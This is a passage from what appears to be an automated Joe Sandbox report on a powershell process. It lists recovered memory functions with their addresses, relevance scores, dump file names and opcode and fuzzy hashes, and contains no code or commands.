                        • Opcode ID: 13657996620ba217f180f6f4a70eabf237f40502bcffd97b3885d640faba98cd
                        • Instruction ID: cc0b214698f83f5480d5572ea7a7c6e04390d9e89845d7628d290bc383552506
                        • Opcode Fuzzy Hash: 13657996620ba217f180f6f4a70eabf237f40502bcffd97b3885d640faba98cd
                        • Instruction Fuzzy Hash: 9FE04F34A0020C8BC714ABA4E84A4FA7FF4AB88315F105125EE1A87741E6302C518BC1
                        Function 04E7FC18 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction ID: f9470b8139b50387587d27bd91f92ca81dd37397028536497d9ad794e9311eaa
                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction Fuzzy Hash: 53D067B0D042099FC780EFADC9415AEFFF4EB48210F6085AAC919E7305F7329A128BD5
                        Function 04E78010 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98b450d5e3f003ad759caa6a72d9d97503a97829b3d728885dacc3cde160808f
                        • Instruction ID: 26ad829dbe5ad96f0a48b1b906dcf99a1e59ffd6174a398dfcdfc0a31ef21df2
                        • Opcode Fuzzy Hash: 98b450d5e3f003ad759caa6a72d9d97503a97829b3d728885dacc3cde160808f
                        • Instruction Fuzzy Hash: 14D06274E0410D9BC754EF64D84A46E7BB5FB88305F104159D90A93354E6746D51CBC1
                        Function 04E77F48 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00e0a127ddadd27df67760654e51b2dc455f2e84c86a79a36a536bef2abffddc
                        • Instruction ID: 5aa77a7fbdb09a6ce3088148d2ef56e82e6f9478e68d30e03ae809231646de6f
                        • Opcode Fuzzy Hash: 00e0a127ddadd27df67760654e51b2dc455f2e84c86a79a36a536bef2abffddc
                        • Instruction Fuzzy Hash: AFD06730D0410D8BCB18ABA4E95B4BDBB74EF54205F908169E907531D0EB683966CEC1
                        Function 04E7C530 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 996032fdc6eb5718e56a804e5c956062429921f67b9c9023a6a6ebee2973b22a
                        • Instruction ID: 7201d5825e4b85a512415b4ae76373ca6b375f2c814b0b9a30ada4a692b7e7e2
                        • Opcode Fuzzy Hash: 996032fdc6eb5718e56a804e5c956062429921f67b9c9023a6a6ebee2973b22a
                        • Instruction Fuzzy Hash: 92C02B5663A3400FFB041A329D043E33F501F813C2F4580A29450CE283EA1C84045361

                        Non-executed Functions

                        Function 04E7D3D0 Relevance: 55.4, Strings: 44, Instructions: 371COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: (_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$(_]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q$4c]q
                        • API String ID: 0-2900268906
                        • Opcode ID: c4df5c120a099f8952cbd717265c0d88b5be08c28c76706fa1e7bb137ac92f33
                        • Instruction ID: a42b46b68269f7b5c7f4147c319503234a404daa34d8f0309e95695ee2981d4f
                        • Opcode Fuzzy Hash: c4df5c120a099f8952cbd717265c0d88b5be08c28c76706fa1e7bb137ac92f33
                        • Instruction Fuzzy Hash: 13E154B0A00B06CFD718DF6DC4C4A59FBF2BF84318F649A29C0569B794DB35A846CB51
                        Function 04E7DD88 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR]q$PH]q$$]q$$]q
                        • API String ID: 0-3307124116
                        • Opcode ID: ddbfdfa3405541c57769603e3b42029a5ff53ad6b70c85e116d6c815b61201bc
                        • Instruction ID: 16659ee984719f2b61d5dfaede3d498f5196dabb2644180950f6c606a09db5ee
                        • Opcode Fuzzy Hash: ddbfdfa3405541c57769603e3b42029a5ff53ad6b70c85e116d6c815b61201bc
                        • Instruction Fuzzy Hash: 5C517E34B102099FDB19DF69D854EAE77B6FF88714F108429E9069B3A4DA34EC06CB91
                        Function 07C304C4 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2096074054.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7c30000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q$$]q$$]q
                        • API String ID: 0-858218434
                        • Opcode ID: 922c19c8f3708a99930b4847f8e341b1aecf959c55a47e9d881fc6576f3a3a0b
                        • Instruction ID: 002f9b554a3e1dbea074bd244ceda1c6f6293966975d0d3a752d3878a97ce0ba
                        • Opcode Fuzzy Hash: 922c19c8f3708a99930b4847f8e341b1aecf959c55a47e9d881fc6576f3a3a0b
                        • Instruction Fuzzy Hash: 72219DF3609B460FC336061C19609566FB79FC3610B5946ABC481CF266C838DDC6C3AB
                        Function 07C30308 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2096074054.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7c30000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4']q$4']q$$]q$$]q
                        • API String ID: 0-978391646
                        • Opcode ID: 7cc73894fce0c1f67ad38135ec7e523ff7f7154b8a1dce547e0fc193c12c7e76
                        • Instruction ID: 415010f570c84018af08436d796df45b14014c0224dbaddbd773355ffe2fe06d
                        • Opcode Fuzzy Hash: 7cc73894fce0c1f67ad38135ec7e523ff7f7154b8a1dce547e0fc193c12c7e76
                        • Instruction Fuzzy Hash: F201A26271D7964FC76B02281DB01256FF29F8396071A46D7C4E1CF2E7C9298E4983A7